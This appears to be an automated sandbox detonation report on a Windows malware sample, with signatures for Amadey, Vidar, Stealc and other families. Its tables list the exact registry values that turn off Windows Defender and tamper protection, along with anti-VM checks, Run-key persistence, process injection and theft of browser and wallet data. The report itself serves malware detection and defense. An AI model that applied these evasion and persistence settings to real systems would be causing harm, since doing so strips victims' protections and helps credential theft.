| SHA512 | 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64 |
memory/4932-848-0x0000000000230000-0x0000000000242000-memory.dmp
memory/4932-849-0x0000000000150000-0x0000000000160000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-06 02:01
Reported
2025-03-06 02:04
Platform
win10v2004-20250217-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
LiteHTTP
Litehttp family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Stealc
Stealc family
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109240101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\3ENLJ3CMMO6PXULUKSF.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\10109160101\823a6efeda.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5b9d8483ee.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109130101\\5b9d8483ee.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ccfa1d9368.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109140101\\ccfa1d9368.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d9f9e120ef.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109150101\\d9f9e120ef.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\823a6efeda.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109160101\\823a6efeda.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\84mBY8Tm\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10109210101\ce4pMzk.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1c1e74e5ed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\1c1e74e5ed.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1480 set thread context of 1712 | N/A | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe | C:\Users\Admin\AppData\Local\Temp\10109100101\f194808a53.exe |
| PID 860 set thread context of 3308 | N/A | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4352 set thread context of 3620 | N/A | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 6120 set thread context of 2504 | N/A | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe |
| PID 4484 set thread context of 628 | N/A | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a2c378db75bc7051bd82788993e28336fd80bc006c2cb9746fb6b49d3df0b972.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109220101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109230101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10108470101\1c1e74e5ed.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109140101\ccfa1d9368.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109170101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109120101\97b4267e40.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109130101\5b9d8483ee.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10109150101\d9f9e120ef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DJEAYJCY7MZJOE6H2Q.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109180101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempW3CWEIWIUOBSQOIJK8IAOZV7MBHGRFXD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109090101\ad518fa8eb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109110101\543187b250.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109190101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10109200101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
